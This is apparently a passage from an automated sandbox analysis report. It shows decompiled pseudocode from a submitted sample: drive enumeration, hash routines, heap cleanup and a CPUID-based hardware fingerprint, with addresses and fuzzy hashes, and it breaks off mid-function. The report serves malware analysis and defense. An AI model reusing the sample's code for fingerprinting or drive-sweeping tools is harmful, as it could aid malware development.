                                                                                                                                                                                          0x00ced4e9
                                                                                                                                                                                          0x00ced4ee
                                                                                                                                                                                          0x00ced501
                                                                                                                                                                                          0x00ced51d
                                                                                                                                                                                          0x00ced527
                                                                                                                                                                                          0x00ced528
                                                                                                                                                                                          0x00ced52e
                                                                                                                                                                                          0x00ced530
                                                                                                                                                                                          0x00ced53a
                                                                                                                                                                                          0x00ced53f
                                                                                                                                                                                          0x00ced53f
                                                                                                                                                                                          0x00ced54a
                                                                                                                                                                                          0x00ced552
                                                                                                                                                                                          0x00ced530
                                                                                                                                                                                          0x00ced558
                                                                                                                                                                                          0x00ced558
                                                                                                                                                                                          0x00ced565

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CED501
                                                                                                                                                                                          • GetLogicalDriveStringsW.KERNEL32(00000400,?,?,?,00000001), ref: 00CED515
                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(00000000,?,?,?,00000001), ref: 00CED531
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CED545
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Drive$LogicalStringsType_memset_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 499454866-0
                                                                                                                                                                                          • Opcode ID: ac06092bc30a786f76215d9041ad6840a92b99fc3b2b63b7c4a91187af528cd8
                                                                                                                                                                                          • Instruction ID: 5c498a34a0bc560070d0e25b2a7b268e877f4e582db34c2b37c01a736d6772b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac06092bc30a786f76215d9041ad6840a92b99fc3b2b63b7c4a91187af528cd8
                                                                                                                                                                                          • Instruction Fuzzy Hash: D301B5B1A1121466DB20EF64DC067BE73A8AF41304F444059E641E31C0DBB46A4A8BF1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C928C0 Relevance: 4.6, APIs: 3, Instructions: 146COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E00C928C0(unsigned int* __eax, void* __ecx) {
				void* __edi;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int* _t49;
				unsigned int _t50;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				char* _t94;
				char* _t95;
				void* _t97;
				void* _t98;
				char* _t99;
				char* _t101;
				char* _t102;
				char* _t103;
				unsigned int* _t104;
				unsigned int* _t105;
				unsigned int* _t106;
				unsigned int* _t108;
				unsigned int* _t109;
				unsigned int* _t110;
				unsigned int* _t111;
				unsigned int* _t113;
				unsigned int* _t114;
				unsigned int* _t115;
				intOrPtr _t116;
				void* _t120;

				_t49 = __eax;
				_t116 =  *((intOrPtr*)(__eax + 0x5c));
				_t87 = __eax + 0x1c;
				 *((char*)(_t87 + _t116)) = 0x80;
				_t117 = _t116 + 1;
				_t97 = __ecx;
				if(_t116 + 1 > 0x38) {
					E00D006A0(_t87, _t117 + _t87, 0, 0x40 - _t117);
					_push(1);
					_push(_t49);
					_t117 = 0;
					E00C92A50(_t87);
					_t120 = _t120 + 0x14;
				}
				E00D006A0(_t87, _t117 + _t87, 0, 0x38 - _t117);
				 *((char*)(_t87 + 0x38)) = _t49[6] & 0x000000ff;
				_t88 = _t87 + 0x38;
				 *((char*)(_t88 + 1)) = _t49[6] & 0x000000ff;
				_t89 = _t88 + 1;
				 *((char*)(_t89 + 1)) = _t49[6] & 0x000000ff;
				_t90 = _t89 + 1;
				 *((char*)(_t90 + 1)) = _t49[6] & 0x000000ff;
				_t91 = _t90 + 1;
				 *((char*)(_t91 + 1)) = _t49[5] & 0x000000ff;
				_t92 = _t91 + 1;
				 *((char*)(_t92 + 1)) = _t49[5] & 0x000000ff;
				_t94 = _t92 + 2;
				 *_t94 = _t49[5] & 0x000000ff;
				_t95 = _t94 + 1;
				 *_t95 = _t49[5] & 0x000000ff;
				_t96 = _t95 - 0x3f;
				_push(1);
				_push(_t49);
				E00C92A50(_t95 - 0x3f);
				_t49[0x17] = 0;
				E00D006A0(_t95 - 0x3f, _t96, 0, 0x40);
				_t37 =  *_t49;
				_t98 = _t97 + 1;
				 *((char*)(_t98 - 1)) = _t37 >> 0x18;
				_t99 = _t98 + 1;
				 *((char*)(_t99 - 1)) = _t37 >> 0x10;
				 *_t99 = _t37 >> 8;
				 *(_t99 + 1) = _t37;
				_t38 = _t49[1];
				_t101 = _t99 + 2;
				 *_t101 = _t38 >> 0x18;
				_t102 = _t101 + 1;
				 *_t102 = _t38 >> 0x10;
				_t103 = _t102 + 1;
				 *_t103 = _t38 >> 8;
				_t104 = _t103 + 1;
				 *_t104 = _t38;
				_t39 = _t49[2];
				_t105 =  &(_t104[0]);
				 *_t105 = _t39 >> 0x18;
				_t106 =  &(_t105[0]);
				 *_t106 = _t39 >> 0x10;
				_t108 =  &(_t106[0]);
				 *((char*)(_t108 - 1)) = _t39 >> 8;
				 *_t108 = _t39;
				_t40 = _t49[3];
				_t109 =  &(_t108[0]);
				 *_t109 = _t40 >> 0x18;
				_t110 =  &(_t109[0]);
				 *_t110 = _t40 >> 0x10;
				_t111 =  &(_t110[0]);
				 *_t111 = _t40 >> 8;
				_t111[0] = _t40;
				_t50 = _t49[4];
				_t113 =  &(_t111[0]);
				 *_t113 = _t50 >> 0x18;
				_t114 =  &(_t113[0]);
				 *_t114 = _t50 >> 0x10;
				_t115 =  &(_t114[0]);
				 *_t115 = _t50 >> 8;
				_t115[0] = _t50;
				return 1;
			}




































                                                                                                                                                                                          0x00c928c3
                                                                                                                                                                                          0x00c928c5
                                                                                                                                                                                          0x00c928c9
                                                                                                                                                                                          0x00c928cc
                                                                                                                                                                                          0x00c928d0
                                                                                                                                                                                          0x00c928d1
                                                                                                                                                                                          0x00c928d6
                                                                                                                                                                                          0x00c928e5
                                                                                                                                                                                          0x00c928ea
                                                                                                                                                                                          0x00c928ec
                                                                                                                                                                                          0x00c928ef
                                                                                                                                                                                          0x00c928f1
                                                                                                                                                                                          0x00c928f6
                                                                                                                                                                                          0x00c928f6
                                                                                                                                                                                          0x00c92906
                                                                                                                                                                                          0x00c9290f
                                                                                                                                                                                          0x00c92916
                                                                                                                                                                                          0x00c92919
                                                                                                                                                                                          0x00c92920
                                                                                                                                                                                          0x00c92921
                                                                                                                                                                                          0x00c92928
                                                                                                                                                                                          0x00c92929
                                                                                                                                                                                          0x00c92930
                                                                                                                                                                                          0x00c92931
                                                                                                                                                                                          0x00c92938
                                                                                                                                                                                          0x00c92939
                                                                                                                                                                                          0x00c92941
                                                                                                                                                                                          0x00c92942
                                                                                                                                                                                          0x00c92948
                                                                                                                                                                                          0x00c92949
                                                                                                                                                                                          0x00c9294b
                                                                                                                                                                                          0x00c9294e
                                                                                                                                                                                          0x00c92950
                                                                                                                                                                                          0x00c92953
                                                                                                                                                                                          0x00c9295d
                                                                                                                                                                                          0x00c92964
                                                                                                                                                                                          0x00c92969
                                                                                                                                                                                          0x00c9296b
                                                                                                                                                                                          0x00c92971
                                                                                                                                                                                          0x00c92974
                                                                                                                                                                                          0x00c9297a
                                                                                                                                                                                          0x00c92982
                                                                                                                                                                                          0x00c92984
                                                                                                                                                                                          0x00c92987
                                                                                                                                                                                          0x00c9298b
                                                                                                                                                                                          0x00c92991
                                                                                                                                                                                          0x00c92993
                                                                                                                                                                                          0x00c92999
                                                                                                                                                                                          0x00c9299b
                                                                                                                                                                                          0x00c929a1
                                                                                                                                                                                          0x00c929a3
                                                                                                                                                                                          0x00c929a4
                                                                                                                                                                                          0x00c929a6
                                                                                                                                                                                          0x00c929a9
                                                                                                                                                                                          0x00c929af
                                                                                                                                                                                          0x00c929b3
                                                                                                                                                                                          0x00c929ba
                                                                                                                                                                                          0x00c929bf
                                                                                                                                                                                          0x00c929c3
                                                                                                                                                                                          0x00c929c6
                                                                                                                                                                                          0x00c929c8
                                                                                                                                                                                          0x00c929cb
                                                                                                                                                                                          0x00c929d1
                                                                                                                                                                                          0x00c929d3
                                                                                                                                                                                          0x00c929d9
                                                                                                                                                                                          0x00c929db
                                                                                                                                                                                          0x00c929e1
                                                                                                                                                                                          0x00c929e3
                                                                                                                                                                                          0x00c929e6
                                                                                                                                                                                          0x00c929ea
                                                                                                                                                                                          0x00c929f0
                                                                                                                                                                                          0x00c929f4
                                                                                                                                                                                          0x00c929f8
                                                                                                                                                                                          0x00c929fc
                                                                                                                                                                                          0x00c92a01
                                                                                                                                                                                          0x00c92a03
                                                                                                                                                                                          0x00c92a0e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2102423945-0
                                                                                                                                                                                          • Opcode ID: 10f41c09d213cb18288e07a49cb4743feb97102aafce5a25fe7151e70342efaa
                                                                                                                                                                                          • Instruction ID: 8c4ce9bb51ce124a76cba2f1000ec3801d7e2d8c21346ea355e684811fa4413f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10f41c09d213cb18288e07a49cb4743feb97102aafce5a25fe7151e70342efaa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3141D60125D3D25BD71A8E3E0CC076ABFCA8FF3200B48459EE8C28B387C49594A6C7B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8A1D0 Relevance: 2.5, APIs: 2, Instructions: 24memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8A1D0(intOrPtr __ebx) {
				void* _t5;
				intOrPtr _t6;
				void* _t8;
				void* _t10;

				_t6 = __ebx;
				_t10 =  *(__ebx + 0x5a8);
				if(_t10 != __ebx) {
					do {
						_t8 =  *(_t10 + 0x5a8);
						_t5 = GetProcessHeap();
						if(_t5 != 0) {
							_t5 = HeapFree(_t5, 0, _t10);
						}
						_t10 = _t8;
					} while (_t8 != _t6);
				}
				 *((intOrPtr*)(_t6 + 0x5a8)) = _t6;
				 *((intOrPtr*)(_t6 + 0x5ac)) = _t6;
				return _t5;
			}







                                                                                                                                                                                          0x00c8a1d0
                                                                                                                                                                                          0x00c8a1d1
                                                                                                                                                                                          0x00c8a1d9
                                                                                                                                                                                          0x00c8a1e3
                                                                                                                                                                                          0x00c8a1e3
                                                                                                                                                                                          0x00c8a1e9
                                                                                                                                                                                          0x00c8a1ed
                                                                                                                                                                                          0x00c8a1f3
                                                                                                                                                                                          0x00c8a1f3
                                                                                                                                                                                          0x00c8a1f9
                                                                                                                                                                                          0x00c8a1fb
                                                                                                                                                                                          0x00c8a200
                                                                                                                                                                                          0x00c8a201
                                                                                                                                                                                          0x00c8a207
                                                                                                                                                                                          0x00c8a20e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,00C89EFA,8A9E1774,00988BD8,?,00000000,00D3882B,000000FF,00C89FE6,00988BD8,00C89B17), ref: 00C8A1E9
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,00C89EFA,8A9E1774,00988BD8,?,00000000,00D3882B,000000FF,00C89FE6,00988BD8,00C89B17), ref: 00C8A1F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                          • Opcode ID: 3dc4acbddfb86234f434a31590bcc62c76244b57d73486c319a5c8562a983df1
                                                                                                                                                                                          • Instruction ID: 7774a5d552a790a88e32b3d2ba69a056a4f39b65ce3c2087d29d6a2ff5e0a390
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc4acbddfb86234f434a31590bcc62c76244b57d73486c319a5c8562a983df1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE080327017119FDB606F1EACC47977798AB45215F05017FDD64A7201CB716D414FB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C865C0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00C865C0(intOrPtr __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				void* _v68;
				signed int _v72;
				signed int _v76;
				char* _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t44;
				signed int _t53;
				intOrPtr _t55;
				signed int _t56;
				intOrPtr _t57;
				signed int _t62;
				char* _t71;
				intOrPtr _t74;
				intOrPtr* _t77;
				intOrPtr _t78;
				signed int _t79;
				void* _t80;

				_push(0xfffffffe);
				_push(0xd59eb0);
				_push(E00D00A50);
				_push( *[fs:0x0]);
				_t43 =  *0xd64070; // 0x8a9e1774
				_v12 = _v12 ^ _t43;
				_t44 = _t43 ^ _t79;
				_v36 = _t44;
				_push(_t55);
				_push(_t44);
				 *[fs:0x0] =  &_v20;
				_v28 = _t80 - 0x4c;
				_v56 = _a4;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v60 = 0;
				_v8 = 0;
				_t77 =  &_v92;
				asm("cpuid");
				 *_t77 = 0;
				 *((intOrPtr*)(_t77 + 4)) = _t55;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *((intOrPtr*)(_t77 + 0xc)) = __edx;
				_v52 = _v88;
				_t71 = _v80;
				_v48 = _t71;
				_v44 = _v84;
				_v40 = 0;
				asm("cpuid");
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t55;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *((intOrPtr*)(_t77 + 0xc)) = _t71;
				_v72 = _v92;
				_t72 = _v80;
				_v68 = _v80;
				_v8 = 0xfffffffe;
				_t62 = _v76;
				_t50 = _t62;
				_t56 = _v56;
				if(_t62 == 0) {
					_push(_v68);
					_push(_v72);
					_t72 =  &_v52;
					_t53 = E00C83BA0(_t56, 0x2000, "%s:%I64X",  &_v52);
					if(_t53 == 0) {
						_t50 = _t53 | 0xffffffff;
					} else {
						_v56 = 0;
						if(_t56 == 0) {
							L6:
							_t50 = 0;
						} else {
							_t72 = _t56;
							if(E00C839F0(0x2000, _t56,  &_v56) < 0) {
								goto L6;
							} else {
								_t50 = _v56;
							}
						}
					}
				}
				 *[fs:0x0] = _v20;
				_pop(_t74);
				_pop(_t78);
				_pop(_t57);
				return E00D0071A(_t50, _t57, _v36 ^ _t79, _t72, _t74, _t78);
			}





































                                                                                                                                                                                          0x00c865c3
                                                                                                                                                                                          0x00c865c5
                                                                                                                                                                                          0x00c865ca
                                                                                                                                                                                          0x00c865d5
                                                                                                                                                                                          0x00c865d9
                                                                                                                                                                                          0x00c865de
                                                                                                                                                                                          0x00c865e1
                                                                                                                                                                                          0x00c865e3
                                                                                                                                                                                          0x00c865e6
                                                                                                                                                                                          0x00c865e9
                                                                                                                                                                                          0x00c865ed
                                                                                                                                                                                          0x00c865f3
                                                                                                                                                                                          0x00c865f9
                                                                                                                                                                                          0x00c865fe
                                                                                                                                                                                          0x00c86601
                                                                                                                                                                                          0x00c86604
                                                                                                                                                                                          0x00c86607
                                                                                                                                                                                          0x00c8660a
                                                                                                                                                                                          0x00c8660d
                                                                                                                                                                                          0x00c86612
                                                                                                                                                                                          0x00c86614
                                                                                                                                                                                          0x00c86616
                                                                                                                                                                                          0x00c86619
                                                                                                                                                                                          0x00c8661c
                                                                                                                                                                                          0x00c86622
                                                                                                                                                                                          0x00c86625
                                                                                                                                                                                          0x00c86628
                                                                                                                                                                                          0x00c8662e
                                                                                                                                                                                          0x00c86631
                                                                                                                                                                                          0x00c8663f
                                                                                                                                                                                          0x00c86641
                                                                                                                                                                                          0x00c86643
                                                                                                                                                                                          0x00c86646
                                                                                                                                                                                          0x00c86649
                                                                                                                                                                                          0x00c8664f
                                                                                                                                                                                          0x00c86652
                                                                                                                                                                                          0x00c86655
                                                                                                                                                                                          0x00c86658
                                                                                                                                                                                          0x00c8665f
                                                                                                                                                                                          0x00c86662
                                                                                                                                                                                          0x00c8667e
                                                                                                                                                                                          0x00c86683
                                                                                                                                                                                          0x00c86688
                                                                                                                                                                                          0x00c8668c
                                                                                                                                                                                          0x00c8668d
                                                                                                                                                                                          0x00c8669b
                                                                                                                                                                                          0x00c866a5
                                                                                                                                                                                          0x00c866ce
                                                                                                                                                                                          0x00c866a7
                                                                                                                                                                                          0x00c866a7
                                                                                                                                                                                          0x00c866b0
                                                                                                                                                                                          0x00c866ca
                                                                                                                                                                                          0x00c866ca
                                                                                                                                                                                          0x00c866b2
                                                                                                                                                                                          0x00c866ba
                                                                                                                                                                                          0x00c866c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c866c5
                                                                                                                                                                                          0x00c866c5
                                                                                                                                                                                          0x00c866c5
                                                                                                                                                                                          0x00c866c3
                                                                                                                                                                                          0x00c866b0
                                                                                                                                                                                          0x00c866a5
                                                                                                                                                                                          0x00c866d4
                                                                                                                                                                                          0x00c866dc
                                                                                                                                                                                          0x00c866dd
                                                                                                                                                                                          0x00c866de
                                                                                                                                                                                          0x00c866ec

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _vswprintf_s
                                                                                                                                                                                          • String ID: %s:%I64X
                                                                                                                                                                                          • API String ID: 677850445-3180616182
                                                                                                                                                                                          • Opcode ID: 245a30886003adcab84ad7d178f303b6ea89bb36dcb0df4b4322498cfba74157
                                                                                                                                                                                          • Instruction ID: b641ecaa129dace7441600521bbe9d045f2e4cdadd244c5206471888ab61f84b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 245a30886003adcab84ad7d178f303b6ea89bb36dcb0df4b4322498cfba74157
                                                                                                                                                                                          • Instruction Fuzzy Hash: C741F5B1E017489FCB14DFA9D981A9EBBF5FB48314F10852EE81AE7380E730A9058B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFFAC0 Relevance: .6, Instructions: 637COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                          			E00CFFAC0(intOrPtr* __eax) {
				signed int _t252;
				signed int _t308;
				intOrPtr* _t319;
				intOrPtr _t357;
				signed int _t381;
				intOrPtr _t401;
				intOrPtr _t407;
				signed int _t409;
				intOrPtr _t415;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				intOrPtr* _t427;
				signed int _t430;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t446;
				signed int _t466;
				signed int _t483;
				signed int _t484;
				signed int _t497;
				signed int _t499;
				signed int _t501;
				signed int _t503;
				signed int _t505;
				signed int _t507;
				signed int _t509;
				signed int _t511;
				signed int _t518;
				signed int _t520;
				signed int _t522;
				signed int _t524;
				signed int _t526;
				signed int _t528;
				signed int _t530;
				signed int _t532;
				signed int _t534;
				signed int _t536;
				signed int _t542;
				intOrPtr _t543;
				signed int _t545;
				signed int _t547;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t555;
				signed int _t558;
				signed int _t560;
				signed int _t565;
				signed int _t567;
				signed int _t572;
				signed int _t574;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed int _t590;
				signed int _t592;
				signed int _t594;
				signed int _t596;
				signed int _t598;
				intOrPtr _t602;
				intOrPtr _t603;
				signed int _t605;
				signed int _t607;
				signed int _t609;
				signed int _t611;
				signed int _t628;
				signed int _t629;
				signed int _t631;
				signed int _t633;
				signed int _t635;
				signed int _t637;
				signed int _t639;
				signed int _t641;
				signed int _t643;
				signed int _t645;
				signed int _t647;
				signed int _t649;
				signed int _t651;
				intOrPtr _t652;
				signed int _t661;
				signed int _t663;
				signed int _t665;
				signed int _t672;
				signed int _t674;
				intOrPtr _t763;
				intOrPtr _t764;
				intOrPtr _t783;
				intOrPtr _t784;
				void* _t785;

				_t427 =  *((intOrPtr*)(_t785 + 0x44));
				_t518 =  *(_t427 + 0xc);
				_t629 =  *(_t427 + 8);
				_t558 =  *(_t427 + 4);
				asm("rol ecx, 0x7");
				_t430 = ( !_t558 & _t518 | _t629 & _t558) +  *__eax +  *_t427 - 0x28955b88 + _t558;
				_t9 = _t518 - 0x173848aa; // -389564486
				asm("rol edx, 0xc");
				_t520 = ( !_t430 & _t629 | _t558 & _t430) +  *((intOrPtr*)(__eax + 4)) + _t9 + _t430;
				_t12 = _t629 + 0x242070db; // 0x24ea2f51
				asm("ror esi, 0xf");
				_t631 = ( !_t520 & _t558 | _t520 & _t430) +  *(__eax + 8) + _t12 + _t520;
				asm("ror edi, 0xa");
				_t560 = ( !_t631 & _t430 | _t520 & _t631) +  *((intOrPtr*)(__eax + 0xc)) + _t558 - 0x3e423112 + _t631;
				 *(_t785 + 0x10) = _t560;
				_t565 =  *(_t785 + 0x10);
				asm("rol ecx, 0x7");
				_t432 = ( !_t560 & _t520 | _t631 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x10)) + _t430 - 0xa83f051 + _t565;
				asm("rol edx, 0xc");
				_t522 = ( !_t432 & _t631 | _t565 & _t432) +  *((intOrPtr*)(__eax + 0x14)) + _t520 + 0x4787c62a + _t432;
				asm("ror esi, 0xf");
				_t633 = ( !_t522 & _t565 | _t522 & _t432) +  *((intOrPtr*)(__eax + 0x18)) + _t631 - 0x57cfb9ed + _t522;
				 *((intOrPtr*)(_t785 + 0x14)) =  *((intOrPtr*)(__eax + 0x1c));
				_t357 =  *((intOrPtr*)(__eax + 0x20));
				asm("ror edi, 0xa");
				_t567 = ( !_t633 & _t432 | _t522 & _t633) +  *((intOrPtr*)(_t785 + 0x14)) + _t565 - 0x2b96aff + _t633;
				 *(_t785 + 0x10) = _t567;
				 *((intOrPtr*)(_t785 + 0x38)) = _t357;
				_t572 =  *(_t785 + 0x10);
				asm("rol ecx, 0x7");
				_t434 = ( !_t567 & _t522 | _t633 &  *(_t785 + 0x10)) + _t357 + _t432 + 0x698098d8 + _t572;
				asm("rol edx, 0xc");
				_t524 = ( !_t434 & _t633 | _t572 & _t434) +  *((intOrPtr*)(__eax + 0x24)) + _t522 - 0x74bb0851 + _t434;
				asm("ror esi, 0xf");
				_t635 = ( !_t524 & _t572 | _t524 & _t434) +  *((intOrPtr*)(__eax + 0x28)) + _t633 - 0xa44f + _t524;
				asm("ror edi, 0xa");
				_t574 = ( !_t635 & _t434 | _t524 & _t635) +  *((intOrPtr*)(__eax + 0x2c)) + _t572 - 0x76a32842 + _t635;
				 *(_t785 + 0x10) = _t574;
				_t579 =  *(_t785 + 0x10);
				 *((intOrPtr*)(_t785 + 0x18)) =  *((intOrPtr*)(__eax + 0x34));
				asm("rol ecx, 0x7");
				_t436 = ( !_t574 & _t524 | _t635 &  *(_t785 + 0x10)) +  *((intOrPtr*)(__eax + 0x30)) + _t434 + 0x6b901122 + _t579;
				asm("rol edx, 0xc");
				_t526 = ( !_t436 & _t635 | _t579 & _t436) +  *((intOrPtr*)(_t785 + 0x18)) + _t524 - 0x2678e6d + _t436;
				_t381 =  !_t526;
				asm("ror esi, 0xf");
				_t637 = _t635 + (_t381 & _t579 | _t526 & _t436) +  *((intOrPtr*)(__eax + 0x38)) - 0x5986bc72 + _t526;
				_t583 =  !_t637;
				 *(_t785 + 0x1c) = _t583;
				asm("ror edi, 0xa");
